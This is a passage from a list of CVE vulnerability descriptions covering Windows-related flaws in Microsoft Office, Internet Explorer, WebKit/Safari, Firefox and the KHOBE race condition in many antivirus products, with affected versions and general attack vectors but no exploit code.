Visio file, which allows remote attackers to execute arbitrary code via a file containing a malformed structure, aka "Visio Data Type Memory Corruption Vulnerability." [CVE-2011-0092] The LZW stream decompression functionality in ORMELEMS.DLL in Microsoft Visio 2002 SP2, 2003 SP3, and 2007 SP2 allows remote attackers to execute arbitrary code via a Visio file with a malformed VisioDocument stream that triggers an exception handler that accesses an object that has not been fully initialized, which triggers memory corruption, aka "Visio Object Memory Corruption Vulnerability." [CVE-2011-0071] Directory traversal vulnerability in Mozilla Firefox before 3.5.19 and 3.6.x before 3.6.17, Thunderbird before 3.1.10, and SeaMonkey before 2.0.14 on Windows allows remote attackers to determine the existence of arbitrary files, and possibly load resources, via vectors involving a resource: URL. [CVE-2011-0058] Buffer overflow in Mozilla Firefox before 3.5.17 and 3.6.x before 3.6.14, and SeaMonkey before 2.0.12, on Windows allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a long string that triggers construction of a long text run. [CVE-2011-0038] Untrusted search path vulnerability in Microsoft Internet Explorer 8 might allow local users to gain privileges via a Trojan horse IEShims.dll in the current working directory, as demonstrated by a Desktop directory that contains an HTML file, aka "Internet Explorer Insecure Library Loading Vulnerability." [CVE-2011-0036] Microsoft Internet Explorer 6, 7, and 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, relagted to a "dangling pointer," aka "Uninitialized Memory Corruption Vulnerability," a different vulnerability than CVE-2010-2556 and CVE-2011-0035. [CVE-2011-0035] Microsoft Internet Explorer 6, 7, and 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability," a different vulnerability than CVE-2010-2556 and CVE-2011-0036. [CVE-2011-0029] Untrusted search path vulnerability in the client in Microsoft Remote Desktop Connection 5.2, 6.0, 6.1, and 7.0 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a .rdp file, aka "Remote Desktop Insecure Library Loading Vulnerability." [CVE-2010-5184] DISPUTED Race condition in ZoneAlarm Extreme Security 9.1.507.000 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5183] DISPUTED Race condition in Webroot Internet Security Essentials 6.1.0.145 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5182] DISPUTED Race condition in VirusBuster Internet Security Suite 3.2 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5181] DISPUTED Race condition in VIPRE Antivirus Premium 4.0.3272 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5180] DISPUTED Race condition in VBA32 Personal 3.12.12.4 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5179] DISPUTED Race condition in Trend Micro Internet Security Pro 2010 17.50.1647.0000 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5178] DISPUTED Race condition in ThreatFire 4.7.0.17 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5177] DISPUTED Race condition in Sophos Endpoint Security and Control 9.0.5 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: the vendor disputes this issue because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5176] DISPUTED Race condition in Security Shield 2010 13.0.16.313 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5175] DISPUTED Race condition in PrivateFirewall 7.0.20.37 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5174] DISPUTED Race condition in Prevx 3.0.5.143 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5173] DISPUTED Race condition in PC Tools Firewall Plus 6.0.0.88 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5172] DISPUTED Race condition in Panda Internet Security 2010 15.01.00 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5171] DISPUTED Race condition in Outpost Security Suite Pro 6.7.3.3063.452.0726 and 7.0.3330.505.1221 BETA on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5170] DISPUTED Race condition in Online Solutions Security Suite 1.5.14905.0 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5169] DISPUTED Race condition in Online Armor Premium 4.0.0.35 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5168] DISPUTED Race condition in Symantec Norton Internet Security 2010 17.5.0.127 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5167] DISPUTED Race condition in Norman Security Suite PRO 8.0 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5166] DISPUTED Race condition in McAfee Total Protection 2010 10.0.580 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5165] DISPUTED Race condition in Malware Defender 2.6.0 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5164] DISPUTED Race condition in KingSoft Personal Firewall 9 Plus 2009.05.07.70 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5163] DISPUTED Race condition in Kaspersky Internet Security 2010 9.0.0.736 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5162] DISPUTED Race condition in G DATA TotalCare 2010 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5161] DISPUTED Race condition in F-Secure Internet Security 2010 10.00 build 246 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5160] DISPUTED Race condition in ESET Smart Security 4.2.35.3 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5159] DISPUTED Race condition in Dr.Web Security Space Pro 6.0.0.03100 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5158] DISPUTED Race condition in DefenseWall Personal Firewall 3.00 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5157] Race condition in Comodo Internet Security before 4.1.149672.916 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. [CVE-2010-5156] DISPUTED Race condition in CA Internet Security Suite Plus 2010 6.0.0.272 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5155] DISPUTED Race condition in Blink Professional 4.6.1 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5154] DISPUTED Race condition in BitDefender Total Security 2010 13.0.20.347 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5153] DISPUTED Race condition in Avira Premium Security Suite 10.0.0.536 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5152] DISPUTED Race condition in AVG Internet Security 9.0.791 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5151] DISPUTED Race condition in avast! Internet Security 5.0.462 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5150] DISPUTED Race condition in 3D EQSecure Professional Edition 4.2 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5145] The Filtering Service in Websense Web Security and Web Filter before 6.3.1 Hotfix 136 and 7.x before 7.1.1 on Windows allows remote attackers to cause a denial of service (filtering outage) via a crafted sequence of characters in a URI. [CVE-2010-5144] The ISAPI Filter plug-in in Websense Enterprise, Websense Web Security, and Websense Web Filter 6.3.3 and earlier, when used in conjunction with a Microsoft ISA or Microsoft Forefront TMG server, allows remote attackers to bypass intended filtering and monitoring activities for web traffic via an HTTP Via header. [CVE-2010-5071] The JavaScript implementation in Microsoft Internet Explorer 8.0 and earlier does not properly restrict the set of values contained in the object returned by the getComputedStyle method, which allows remote attackers to obtain sensitive information about visited web pages by calling this method. [CVE-2010-4833] Untrusted search path vulnerability in modules/engines/ms-windows/xp_theme.c in GTK+ before 2.24.0 allows local users to gain privileges via a Trojan horse uxtheme.dll file in the current working directory, a different vulnerability than CVE-2010-4831. [CVE-2010-4785] The do_extendedOp function in ibmslapd in IBM Tivoli Directory Server (TDS) 6.0 before 6.0.0.62 (aka 6.0.0.8-TIV-ITDS-IF0004) on Linux, Solaris, and Windows allows remote authenticated users to cause a denial of service (ABEND) via a malformed LDAP extended operation that triggers certain comparisons involving the NULL operation OID. [CVE-2010-4643] Heap-based buffer overflow in Impress in OpenOffice.org (OOo) 2.x and 3.x before 3.3 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted Truevision TGA (TARGA) file in an ODF or Microsoft Office document. [CVE-2010-4588] The WBEMSingleView.ocx ActiveX control 1.50.1131.0 in Microsoft WMI Administrative Tools 1.1 and earlier allows remote attackers to execute arbitrary code via a crafted argument to the ReleaseContext method, a different vector than CVE-2010-3973, possibly an untrusted pointer dereference. [CVE-2010-4587] Opera before 11.00 on Windows does not properly implement the Insecure Third Party Module warning message, which might make it easier for user-assisted remote attackers to have an unspecified impact via a crafted module. [CVE-2010-4466] Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier for Windows, Solaris, and, Linux [CVE-2010-4451] Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier for Windows, when using Java Update, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Install. [CVE-2010-4423] Unspecified vulnerability in the Cluster Verify Utility component in Oracle Database Server 10.2.0.4, 10.2.0.5, 11.1.0.7, and 11.2.0.1, when running on Windows, allows local users to affect confidentiality, integrity, and availability via unknown vectors. [CVE-2010-4368] awstats.cgi in AWStats before 7.0 on Windows accepts a configdir parameter in the URL, which allows remote attackers to execute arbitrary commands via a crafted configuration file located at a UNC share pathname. [CVE-2010-4294] The frame decompression functionality in the VMnc media codec in VMware Movie Decoder before 6.5.5 build 328052 and 7.x before 7.1.2 build 301548, VMware Workstation 6.5.x before 6.5.5 build 328052 and 7.x before 7.1.2 build 301548 on Windows, VMware Player 2.5.x before 2.5.5 build 246459 and 3.x before 3.1.2 build 301548 on Windows, and VMware Server 2.x on Windows does not properly validate an unspecified size field, which allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via a crafted video file. [CVE-2010-4253] Heap-based buffer overflow in Impress in OpenOffice.org (OOo) 2.x and 3.x before 3.3 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted PNG file in an ODF or Microsoft Office document, as demonstrated by a PowerPoint (aka PPT) document. [CVE-2010-4121] DISPUTED The TCP-to-ODBC gateway in IBM Tivoli Provisioning Manager for OS Deployment 7.1.1.3 does not require authentication for SQL statements, which allows remote attackers to modify, create, or read database records via a session on TCP port 2020. NOTE: the vendor disputes this issue, stating that the "default Microsoft Access database is not password protected because it is intended to be used for evaluation purposes only." [CVE-2010-4091] The EScript.api plugin in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.1, and 8.x before 8.2.6 on Windows and Mac OS X allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document that triggers memory corruption, involving the printSeps function. NOTE: some of these details are obtained from third party information. [CVE-2010-3976] Untrusted search path vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse dwmapi.dll that is located in the same folder as a file that is processed by Flash Player. [CVE-2010-3972] Heap-based buffer overflow in the TELNET_STREAM_CONTEXT::OnSendData function in ftpsvc.dll in Microsoft FTP Service 7.0 and 7.5 for Internet Information Services (IIS) 7.0, and IIS 7.5, allows remote attackers to execute arbitrary code or cause a denial of service (daemon crash) via a crafted FTP command, aka "IIS FTP Service Heap Buffer Overrun Vulnerability." NOTE: some of these details are obtained from third party information. [CVE-2010-3971] Use-after-free vulnerability in the CSharedStyleSheet::Notify function in the Cascading Style Sheets (CSS) parser in mshtml.dll, as used in Microsoft Internet Explorer 6 through 8 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a self-referential @import rule in a stylesheet, aka "CSS Memory Corruption Vulnerability." [CVE-2010-3964] Unrestricted file upload vulnerability in the Document Conversions Launcher Service in Microsoft Office SharePoint Server 2007 SP2, when the Document Conversions Load Balancer Service is enabled, allows remote attackers to execute arbitrary code via a crafted SOAP request to TCP port 8082, aka "Malformed Request Code Execution Vulnerability." [CVE-2010-3962] Use-after-free vulnerability in Microsoft Internet Explorer 6, 7, and 8 allows remote attackers to execute arbitrary code via vectors related to Cascading Style Sheets (CSS) token sequences and the clip attribute, aka an "invalid flag reference" issue or "Uninitialized Memory Corruption Vulnerability," as exploited in the wild in November 2010. [CVE-2010-3958] The x86 JIT compiler in Microsoft .NET Framework 2.0 SP2, 3.5 SP1, 3.5.1, and 4.0 does not properly compile function calls, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka ".NET Framework Stack Corruption Vulnerability." [CVE-2010-3955] pubconv.dll (aka the Publisher Converter DLL) in Microsoft Publisher 2002 SP3 does not properly perform array indexing, which allows remote attackers to execute arbitrary code via a crafted Publisher file that uses an old file format, aka "Array Indexing Memory Corruption Vulnerability." [CVE-2010-3954] Microsoft Publisher 2002 SP3, 2003 SP3, and 2010 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Publisher file, aka "Microsoft Publisher Memory Corruption Vulnerability." [CVE-2010-3952] The FlashPix image converter in the graphics filters in Microsoft Office XP SP3 and Office Converter Pack allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via a crafted FlashPix image in an Office document, aka "FlashPix Image Converter Heap Corruption Vulnerability." [CVE-2010-3951] Buffer overflow in the FlashPix image converter in the graphics filters in Microsoft Office XP SP3 and Office Converter Pack allows remote attackers to execute arbitrary code via a crafted FlashPix image in an Office document, aka "FlashPix Image Converter Buffer Overflow Vulnerability." [CVE-2010-3950] The TIFF image converter in the graphics filters in Microsoft Office XP SP3, Office Converter Pack, and Works 9 does not properly convert data, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted TIFF image in an Office document, aka "TIFF Image Converter Memory Corruption Vulnerability." [CVE-2010-3949] Buffer overflow in the TIFF image converter in the graphics filters in Microsoft Office XP SP3 and Office Converter Pack allows remote attackers to execute arbitrary code via a crafted TIFF image in an Office document, aka "TIFF Image Converter Buffer Overflow Vulnerability." [CVE-2010-3947] Heap-based buffer overflow in the TIFF image converter in the graphics filters in Microsoft Office XP SP3, Office Converter Pack, and Works 9 allows remote attackers to execute arbitrary code via a crafted TIFF image in an Office document, aka "TIFF Image Converter Heap Overflow Vulnerability." [CVE-2010-3946] Integer overflow in the PICT image converter in the graphics filters in Microsoft Office XP SP3, Office 2003 SP3, and Office Converter Pack allows remote attackers to execute arbitrary code via a crafted PICT image in an Office document, aka "PICT Image Converter Integer Overflow Vulnerability." [CVE-2010-3945] Buffer overflow in the CGM image converter in the graphics filters in Microsoft Office XP SP3, Office 2003 SP3, and Office Converter Pack allows remote attackers to execute arbitrary code via a crafted CGM image in an Office document, aka "CGM Image Converter Buffer Overrun Vulnerability." [CVE-2010-3937] Microsoft Exchange Server 2007 SP2 on the x64 platform allows remote authenticated users to cause a denial of service (infinite loop and MSExchangeIS outage) via a crafted RPC request, aka "Exchange Server Infinite Loop Vulnerability." [CVE-2010-3936] Cross-site scripting (XSS) vulnerability in Signurl.asp in Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, 2010 Update 1, and 2010 Update 2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "XSS in Signurl.asp Vulnerability." [CVE-2010-3886] The CTimeoutEventList::InsertIntoTimeoutList function in Microsoft mshtml.dll uses a certain pointer value as part of producing Timer ID values for the setTimeout and setInterval methods in VBScript and JScript, which allows remote attackers to obtain sensitive information about the heap memory addresses used by an application, as demonstrated by the Internet Explorer 8 application. [CVE-2010-3826] WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, does not properly perform a cast of an unspecified variable during processing of colors in an SVG document, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted web site. [CVE-2010-3824] Use-after-free vulnerability in WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving SVG use elements. [CVE-2010-3823] Use-after-free vulnerability in WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving Geolocation objects. NOTE: this might overlap CVE-2010-3415. [CVE-2010-3822] WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, accesses an uninitialized pointer during processing of Cascading Style Sheets (CSS) counter styles, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted web site. [CVE-2010-3821] WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, does not properly handle the :first-letter pseudo-element in a Cascading Style Sheets (CSS) token sequence, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site. [CVE-2010-3820] WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, accesses uninitialized memory during processing of editable elements, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted web site. [CVE-2010-3819] WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, does not properly perform a cast of an unspecified variable during processing of Cascading Style Sheets (CSS) boxes, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted web site. [CVE-2010-3818] Use-after-free vulnerability in WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving inline text boxes. [CVE-2010-3817] WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, does not properly perform a cast of an unspecified variable during processing of Cascading Style Sheets (CSS) 3D transforms, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted web site. [CVE-2010-3816] Use-after-free vulnerability in WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving scrollbars. [CVE-2010-3813] The WebCore::HTMLLinkElement::process function in WebCore/html/HTMLLinkElement.cpp in WebKit, as used in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4 [CVE-2010-3812] Integer overflow in the Text::wholeText method in dom/Text.cpp in WebKit, as used in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4 [CVE-2010-3811] Use-after-free vulnerability in WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving element attributes. [CVE-2010-3810] WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, does not properly handle the History object, which allows remote attackers to spoof the location bar's URL or add URLs to the history via a cross-origin attack. [CVE-2010-3809] WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, does not properly perform a cast of an unspecified variable during processing of inline styling, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted web site. [CVE-2010-3808] WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, does not properly perform a cast of an unspecified variable during processing of editing commands, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted web site. [CVE-2010-3805] Integer underflow in WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving WebSockets. NOTE: this may overlap CVE-2010-3254. [CVE-2010-3804] The JavaScript implementation in WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, uses a weak algorithm for generating values of random numbers, which makes it easier for remote attackers to track a user by predicting a value, a related issue to CVE-2008-5913 and CVE-2010-3171. [CVE-2010-3803] Integer overflow in WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted string. [CVE-2010-3785] Buffer overflow in QuickLook in Apple Mac OS X 10.5.8 and 10.6.x before 10.6.5 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted Microsoft Office document. [CVE-2010-3769] The line-breaking implementation in Mozilla Firefox before 3.5.16 and 3.6.x before 3.6.13, Thunderbird before 3.0.11 and 3.1.x before 3.1.7, and SeaMonkey before 2.0.11 on Windows does not properly handle long strings, which allows remote attackers to execute arbitrary code via a crafted document.write call that triggers a buffer over-read. 